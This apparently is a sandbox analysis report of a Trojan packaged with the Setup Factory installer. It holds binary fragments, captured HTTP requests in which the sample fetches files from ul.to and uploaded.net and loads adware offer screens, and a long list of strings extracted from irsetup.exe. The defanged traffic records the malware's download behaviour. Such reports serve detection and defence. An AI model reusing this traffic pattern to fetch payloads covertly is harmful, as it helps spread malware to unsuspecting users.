[email protected]@[email protected];[email protected].
[email protected]@........u....M._..^3.[.........V..W3.h..
[email protected].....<[email protected]
<<< skipped >>>


GET /uj6g51wd HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 8.0
Host: ul.to
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Oct 2015 13:51:19 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: hXXp://uploaded.net/file/uj6g51wd
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 02 Oct 2015 13:51:19 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
Location: hXXp://uploaded.net/file/uj6g51wd..Vary: Accept-Encoding..font>....


GET /pnkw58oz HTTP/1.1


Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 8.0
Host: ul.to
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Oct 2015 13:51:21 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: hXXp://uploaded.net/file/pnkw58oz
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 02 Oct 2015 13:51:21 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
Location: hXXp://uploaded.net/file/pnkw58oz..Vary: Accept-Encoding..font>....


GET /awtvmav8 HTTP/1.1


Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 8.0
Host: ul.to
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Oct 2015 13:51:22 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: hXXp://uploaded.net/file/awtvmav8
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 02 Oct 2015 13:51:22 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
Location: hXXp://uploaded.net/file/awtvmav8..Vary: Accept-Encoding..



GET /offers/images/Theme12/topLine.jpg HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=4&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:38 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......
<<< skipped >>>

GET /offers/images/Theme12/bodyImg.png HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=4&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:39 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......
<<< skipped >>>

GET /offers/images/Theme12/nextCase.jpg HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=4&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:39 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

irsetup.exe_432:

`.rsrc
t%SSSS
9=@%u
SSSSh
t%SWV
u)SSh
u)SShd
TSShX
@ SSh
u%SSSV
SSShT
SSSh`
9^$u&SSSSh?
9^$u SSSSh?
9^$u)SSSSh?
|SShF
t2SSh
Ht.Ht S
FLSSh
NLhD%u
GLSSh
GXSSh
FpSSh
FtSSh
G`SSh
.WWWW
Nt.Nt
t'SShl
u$SShe
@ SSHPWj
tFHt:Ht.Ht"Hu`
tWSShW
tl9_ tgSSh
tAHt.HHt
j%XtL9E
<SShG
FtPW
SSh@B
FTCP
u.Ph,
.FG;}
FTPQ
FTPh
V SShW
O SSh
O SSh,
kernel32.dll
%s (%s:%d)
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin1.inl
MSG_ERROR
%s %d. %s
MSG_ASK_FOR_DISK
MSG_NEW_LOCATION
MSG_CONFIRM_ABORT
MSG_CONFIRM
A%s%s%s.%d
%s.%d
%s, Line %d: %s
File condition evaluation for file "%s"
msi.dll
\msi.dll
Software\Microsoft\Windows\CurrentVersion\Installer
C:\temp\SUF_SFX_TEST\
MSG_INITIALIZING
16670749
_IgnoreInvalidCertificate
SetEntriesInAcl Error %u
SetNamedSecurityInfo Error %u
*.gif
*.tif
*.tga
*.png
*.pcx
*.jpg
*.bmp
[%d]: %s
*** LOCATION: %s
__NOREPORT__
in function <%s:%d>
in function '%s'
Line: %d
%d: [%s]
Script: %s, %s (%s)
__ir_eval_value = %s;
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin2.inl
%Copyright%. All rights reserved. %CompanyURL%
WindowStyle
MainWindowSettings
%s at offset %d unterminated
Incorrect %s at offset %d
Element '%s' at offset %d not ended
End tag '%s' at offset %d does not match start tag '%s' at offset %d
No start tag for end tag '%s' at offset %d
%s%d bytes
%s%d wide chars to %d bytes
%d bytes to %s%d wide chars
MSG_SEARCH_FILE
(*.*)|*.*||
MSG_SEARCH_ALL
MSG_SEARCH_MASK
MSG_INSERTDISK
MSG_CANCEL
MSG_OK
MSG_BROWSE
MSG_PATH
Windows Server 10
Windows 10
Windows Server 2012 R2
Windows 8.1
Windows Server 2012
Windows 8
Windows Server 2008 R2
Windows 7
Windows Server 2008
Windows Vista
Windows Server 2003
Windows XP
CPasswordData
-- Defined in _SUF70_Global_Functions.lua
number e_ErrorCode, string e_ErrorMsgID
%TempFolder%\%ProductName% Setup Log.txt
%StartupFolder%
%StartFolder%
%StartProgramsFolder%
ÞsktopFolder%
%s\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%CommonFilesFolder%\Microsoft Shared\DAO
Software\Microsoft\Shared Tools\DAO350.dll
Software\Microsoft\Shared Tools\DAO360.dll
ÚOPath%
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
%SourceFolder%
%SystemDrive%
_WindowsFolder
%WindowsFolder%
%SystemFolder%
%CommonFilesFolder%
%CommonFilesFolder64%
%CommonProgramW6432%
%CommonDocumentsFolder%
%StartupFolderCommon%
%StartProgramsFolderCommon%
%StartFolderCommon%
%FontsFolder%
ÞsktopFolderCommon%
;?;?.lua
UninstallSupportFiles
CPRegKey
Run extra uninstall script: %d
Original: %d
Calculated: %d
Unable to open archive file: %d
lua5.1.dll
%SourceDrive%
%SourceFilename%
\irsetup.dat
{D387204B-8FB9-6A21-15FA-0CD14BF40EA9}
Support file added to uninstall list:
Registry key added to uninstall list:
Removed! %d
IDispatch error #%d
Error 0xx: %s
Register font: %s, %s
%sbk%d
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
Remove uninstall support file:
MSG_NO
MSG_YES_TOALL
MSG_YES
MSG_UNINSTALL_OK_REMOVE
MSG_UNINSTALL_NO_APP_USE
MSG_UNINSTALL_REMOVE_SHARED
Decrement shared file count: %s (New count = %d)
SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs
: %s (#%d)
Global include script: %s
RegisterTypeLib: %s
RegisterTypeLib failure reason: %s
RegisterTypeLib: %s - %s
Register COM file: %s
Register COM failure reason: %s
Register COM file: %s - System Error # %u
Register COM file on reboot: %s
regsvr32.exe /s %s
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Increment usage count: %s
Increment usage count: %s (New count = %d)
%s\%s
%s (%d)
\irsetup.skin
local e_Stage = %d;local e_CurrentItemText=[==[%s]==];local e_CurrentItemPct=%d;local e_StagePct=%d;
MSG_SYSREQ_WARN
MSG_NOTICE
MSG_SYSREQ_ABORT
%s: %s
MSG_SYSREQ_USERPERMISSION
MSG_SYSREQ_SYSTEMADMIN
MSG_SYSREQ_COLORDEPTH
MSG_BITSPERPIXEL
MSG_SYSREQ_SCREENHEIGHT
%s: %d
MSG_SYSREQ_SCREENWIDTH
%s: %d %s
MSG_SYSREQ_RAM
MSG_SIZE_MEGABYTES
Operating System
MSG_SYSREQ_OS
MSG_OS_PART_ORNEWER
MSG_OS_PART_NOSERVPACK
MSG_OS_PART_SERVPACK
MSG_OS_PART_SE
MSG_OS_PART_C
MSG_OS_PART_B
MSG_OS_PART_A
MSG_OS_ALL
MSG_OS_NONE
MSG_OS_WSRV10
MSG_OS_W10
MSG_OS_WSRV2012_R2
MSG_OS_W8_1
MSG_OS_WSRV2012
MSG_OS_W8
MSG_OS_WSRV2008_R2
MSG_OS_W7
MSG_OS_WSRV2008
MSG_OS_WVISTA
MSG_OS_WSRV2003
MSG_OS_WXP
MSG_OS_UNKNOWN
MSG_SYSREQ_NOTMET
%s %d %s
MSG_EXP_USESLEFT
MSG_EXP_USESLEFT2
%s %I64d %s
MSG_EXP_DAYSLEFT
MSG_EXP_DAYSLEFT2
Software\Microsoft\Windows\CurrentVersion\I652R9823\
MSG_EXP_CONTACT_START
Run project event: %s
local e_ErrorCode=%d; local e_ErrorMsgID = "%s"
Start project event: %s
MSG_UNINSTALLFILE_NOREMOVE
MSG_UNINSTALLFILE_INUSE
%s (%s: %u)
\WININIT.INI
MSG_FILE_EXISTS_INUSE
MSG_FILE_EXISTS_RETRY
MSG_FILE_EXISTS_ANY
MSG_FILE_EXISTS_NEWER
MSG_FILE_OVERWRITE_CONFIRM
%s\%s.lnk
%s (Return code: %d)
Product: %s, version %s
MSG_SEEKING
%s (%d):
Arc: %s
FN: %s
%s (#%d)
MSG_SKIPPING
MSG_INSTALLING
MSG_PROG_UNINSTALL_CREATECONTROLFILE
ERR_CREATEUNINSTALL_OPEN_EXE_READ
ERR_CREATEUNINSTALL_OPEN_EXE_WRITE
Overwrite uninstall executable:
Existing uninstall executable is newer. Will not overwrite.
Compared uninstall file versions. New: %s Old: %s Result: %d
Uninstall executable already exists: %s
MSG_PROG_UNINSTALL_CREATEEXE
@MSG_PROG_UNINSTALL_CREATEDATFILE
MSG_PROG_UNINSTALL_CREATEFOLDER
"/U:%s"
MSG_PROG_UNINSTALL_CREATESC
Create uninstall CP entry key
ERR_CREATEUNINSTALL_CREATEREGKEY
"%s",%d
Uninstall CP entry: URLUpdateInfo =
URLUpdateInfo
Uninstall CP entry: URLInfoAbout =
URLInfoAbout
"%s" "/U:%s"
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
MSG_PROG_UNINSTALL_CREATECPENTRY
MSG_PROG_UNINSTALL_COPYSUPPORTFILES
MSG_PROG_UNINSTALL_COPYPLUGINS
%s %s
MSG_REQUIRED_DRIVE
MSG_AVAILABLE_DRIVE
Dependency Detection Passed
MSG_PROG_CHECKING_DRIVESPACE
MSG_PROG_CHECKING_FILES
%A, %B %d, %Y
[%s] %s
%m/%d/%Y %H:%M:%S
MsgFile
ERR_MSI_PATCH_REMOVAL_UNSUPPORTED
ERR_MSI_PATCH_PACKAGE_UNSUPPORTED
ERR_MSI_INSTALL_PLATFORM_UNSUPPORTED
ERR_MSI_UNSUPPORTED_TYPE
ERR_MSI_INSTALL_LANGUAGE_UNSUPPORTED
ERR_SERVER_FILE_DOWNLOAD_SET_PROXY_PASSWORD
ERR_SERVER_FILE_DOWNLOAD_OPEN_FTP_FILE
ERR_SERVER_FILE_DOWNLOAD_OPEN_HTTP_FILE
ERR_ODBC_INVALID_KEYWORD_VALUE
ERR_WEB_503
ERR_WEB_500
ERR_WEB_404
ERR_WEB_403
ERR_WEB_400
ERR_WEB_SET_PROXY_PASSWORD
ERR_WEB_SET_PROXY_USERNAME
ERR_WEB_WRITE_MEMORY
ERR_WEB_FTP_FILE_OPEN
ERR_WEB_USER_ABORT
ERR_WEB_FILE_WRITE
ERR_WEB_DOWNLOAD_FILE_ERROR
ERR_WEB_INVALID_HTTP_RESPONSE
ERR_WEB_DESTINATION_FILE_OPEN
ERR_WEB_SEND_REQUEST
ERR_WEB_OPEN_REQUEST
ERR_WEB_CREATE_HTTP_CONNECTION
ERR_WEB_CREATE_INTERNET_SESSION
ERR_REG_GET_SUB_KEY_NAME
ERR_REG_NON_EXISTANT_SUB_KEY
ERR_REG_DELETE_KEY
ERR_REG_CREATE_KEY
ERR_FILE_EXECUTION_FAILED_ELEVATION
ERR_KEY_RUN_ON_REBOOT_FAILED
ERR_USER_ABORTED_OPERATION
ERR_NON_EXISTANT_VIEWER_EXE
ERR_FILE_EXECUTION_FAILED
ERR_SPECIFIED_EXE_FILE_INVALID
MSG_SUCCESS
Language set: Primary = %d, Secondary = %d
%CompanyURL%
%CompanyName%
UxTheme.dll
%Copyright% %CompanyName%. All rights reserved. %CompanyURL%
%TempFolder%\%ProductName% Uninstall Log.txt
%CompanyName% Support Department
%AppFolder%\uninstall.exe
uninstall.xml
CWebBrowser2
Confirm Operation
KERNEL32.DLL
PSAPI.DLL
Kernel32.dll
WS2_32.DLL
Copying "%s"
"%s" %s
%d.%d.%d.%d
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\PrivateBuild
Sfc.dll
.bak%d
Windows ME
Windows 98
Windows 95
Windows 2000
Windows NT 4
Windows NT 3
%s\shell\open\command
NUL=%s
Software\Microsoft\Windows NT\CurrentVersion\Fonts
Software\Microsoft\Windows\CurrentVersion\Fonts
***!!!***@@
Advapi32.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%s\%s.url
%s\%s.pif
srclient.dll
%s_%d
%s\_ir_tmpfnt_%d
/\:*?"<>|
%%x
d:d
WinINet.dll
Could not create Internet session: %u
Error downloading file: %u
Error writing the destination file: %d-%u
Could not create HTTP connection: %u
Could not create HTTP connection
Incorrect HTTP status returned by server: %d
Send request failed: %u
Content-Type: application/x-www-form-urlencoded
Could not open HTTP file: %s
PTF://
hXXps://
hXXp://
%s; DIRECT
jsproxy.dll
DetectAutoProxyUrl
wininet.dll
Could not HTTP file: %u
MSG_STATUS_HANDLE_CREATED
MSG_STATUS_HANDLE_CLOSING
MSG_STATUS_REQUEST_COMPLETE
MSG_REDIRECTING
MSG_CONNECTION_CLOSED
MSG_RESOLVING_HOST_NAME
MSG_HOST_NAME_RESOLVED
MSG_CONNECTING_TO_SERVER
MSG_CONNECTED_TO_SERVER
MSG_CLOSING_CONNECTION
MSG: %d
TRACE: LastError = %d ("%s")
Script: %s, %s
Script: %s, Line %d
All Files (*.*)|*.*|
PasswordInput
MSG_MOVING
MSG_COPYING
MSG_FROM
MSG_TO
MSG_DELETING
MSG_SEARCHING
\StringFileInfo\xx\SpecialBuild
\StringFileInfo\xx\OriginalFilename
\StringFileInfo\xx\Comments
\StringFileInfo\xx\LegalTrademarks
\StringFileInfo\xx\LegalCopyright
\StringFileInfo\xx\ProductName
\StringFileInfo\xx\InternalName
\StringFileInfo\xx\FileDescription
\StringFileInfo\xx\CompanyName
ErrorMsg
%Y-%m-%dT%H:%M:%S
MSG_INSTALL_DO_YOU_WANT_OVERWRITE
MSG_INSTALL_ALWAYS_ASK_OVERWRITE_MSG
MSG_INSTALL_FILE_OLDER_MSG
OpenURL
\msiexec.exe
RunMsiexec
SQLInstallerError
SQLRemoveDriverManager
odbccp32.dll
SQLConfigDataSource
SQLInstallDriverEx
SQLInstallDriverManager
SQLRemoveDriver
\Kernel32.dll
GetKeyNames
DoesKeyExist
DeleteKey
CreateKey
ShortcutKey
keycode
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
MSG_SIZE_BYTES
P?MSG_SIZE_KILOBYTES
>MSG_SIZE_GIGABYTES
xxxxxx
%s-%s-%s
%s/%s/%s
%s:%s:%s
%d:%s:%s AM
%d:%s:%s PM
MSG_REBOOT_FAILED
WININET.DLL
PPassword
Password
%s %s %s %s (%0.2f %s)
%0.1f %s/%0.1f %s
%I64u %s/%I64u %s
MSG_KB_PER_SEC
MSG_ESTIMATED_TIME_LEFT
MSG_SAVING
MSG_DOWNLOADING
%s %s %s %s
MSG_QUERYING_INTERNET
MSG_READING
GetHTTPErrorInfo
%s > %s
number e_CtrlID, number e_MsgID, table e_Details
Removed: %s
local e_CtrlID=%d; local e_MsgID=%d;
Button%d
Check%d
ComboBox%d
Edit%d
Space available on selected drive: %SpaceAvailable%
Space required: %SpaceRequired%
Error: The specified file: '%s' could not be found.
Error: The specified file: '%s' could not be opened.
Error: The specified file: '%s' is too large to read.
Error: The specified file: '%s' could not be read.
Application.Exit();
Screen.Next();
Screen.Back();
Radio%d
Total space required: %SpaceRequired%
IDS_CTRL_CHECK_BOX_d
IDS_CTRL_BUTTON_d
IDS_CTRL_STATICTEXT_LABEL_d
IDS_CTRL_COMBOBOX_d_DEFAULT
IDS_CTRL_EDIT_d
IDS_CTRL_RADIO_BUTTON_d
IDS_CTRL_LISTBOX_d
IDS_CTRL_SCROLLTEXT_BODY_d
IDS_CTRL_PROGRESS_BAR_d
IDS_CTRL_GROUP_BOX_d
IDS_CTRL_SELECT_PACKAGE_TREE_d
IDS_CTRL_BILLBOARD_d
CTRL_CHECK_BOX_d
CTRL_BUTTON_d
CTRL_STATICTEXT_LABEL_d
CTRL_COMBOBOX_d
CTRL_EDIT_d
CTRL_RADIO_BUTTON_d
CTRL_LIST_BOX_d
CTRL_SCROLLTEXT_BODY_d
CTRL_PROGRESS_BAR_d
CTRL_GROUP_BOX_d
CTRL_SELECT_PACKAGE_TREE_d
CTRL_BILLBOARD_d
IDS_CTRL_COMBOBOX_d_ITEMS
IDS_CTRL_SCROLLTEXT_FILE_d
WebWindow
IDS_CTRL_CATEGORY_NAME_d_%.3d
IDS_CTRL_CATEGORY_DESCRIPTION_d_%.3d
hXXp://VVV.indigorose.com/route.php?pid=suf9buy
[email protected]
.tiff
.jpeg
.wbmp
CNotSupportedException
user32.dll
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
RegOpenKeyTransactedA
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
CHttpConnection
CHttpFile
HTTP/1.0
msctls_hotkey32
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
mfcm100.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
Shell32.dll
%s:%x:%x:%x:%x
RegDeleteKeyExA
lXXxXXXXXXXX
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
ole32.dll
MFCLink_UrlPrefix
MFCLink_Url
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
&%d %s
Hex={X,X,X}
ShowCmd
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sBasePane-%d%x
%sBasePane-%d
%sPane-%d%x
%sPane-%d
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%c%d%c%s
RGB(%d, %d, %d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
ENABLE_KEYS
KEYS_MENU
KEYS
windows
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
IS 5.0.2.4
Error %d in %s (%s)
Error %d in %s (%s) [%s]
C.o.p.y.r.i.g.h.t...2.0.1.0.
ISLib PNG Error : %s
1.2.22
ISLib JPG Error : %s
DIBToHBITMAP error: GetLastError = %d
read %d. layersLen %d
Reading PCD sub-image #%d (%d x %d)
.cals
Keywords
SetWinMetaFileBits failed GetLastError = %d
GeoKeyDirectory
%s: Invalid InkNames value; expecting %d names, found %d
%s: Bad value %u for "%s" tag
%s: Invalid %stag "%s" (not supported by codec)
%s: Bad field type %d for "%s"
%s: Failed to allocate space for list of custom values
%s: Bad value %d for "%s" tag
%s: Sorry, cannot nest SubIFDs
Nonstandard tile width %d, convert file
Nonstandard tile length %d, convert file
%s: Cannot modify tag "%s" while writing
%s: Unknown %stag %u
%s: Error fetching directory link
%s: Error fetching directory count
Sorry, can not handle images with %d-bit samples
Sorry, LogL data must have %s=%d
Sorry, can not handle LogLuv images with %s=%d
Sorry, LogLuv data must have %s=%d or %d
Sorry, can not handle image with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Sorry, can not handle RGB image with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d
Sorry, can not handle separated image with %s=%d
Missing needed %s tag
No space %s
%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Seek error at scanline %lu, strip %lu
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Seek error at row %ld, col %ld, tile %ld
%s: No space for data buffer at scanline %ld
%s: Data buffer too small to hold strip %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%s: Invalid strip byte count %lu, strip %lu
%s: Data buffer too small to hold tile %ld
"%s": Bad mode
Not a TIFF file, bad version number %d (0x%x)
This is a BigTIFF file. This format not supported
Not a TIFF or MDI file, bad magic number %d (0x%x)
%s: Out of memory (TIFF structure)
Error writing data for field "%s"
%s: Error writing SubIFD directory link
M"%s": Information lost writing value (%g) as (unsigned) RATIONAL
Integer overflow in %s
LIBTIFF, Version 3.9.1
0123456789ABCDEFlibpng error: %s
libpng error: %s, offset=%d
libpng error no. %s: %s
libpng warning: %s
libpng warning no. %s: %s
1.2.3
NULL row buffer for row %ld, pass %d
iTXt chunk not supported.
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Bogus DQT index %d
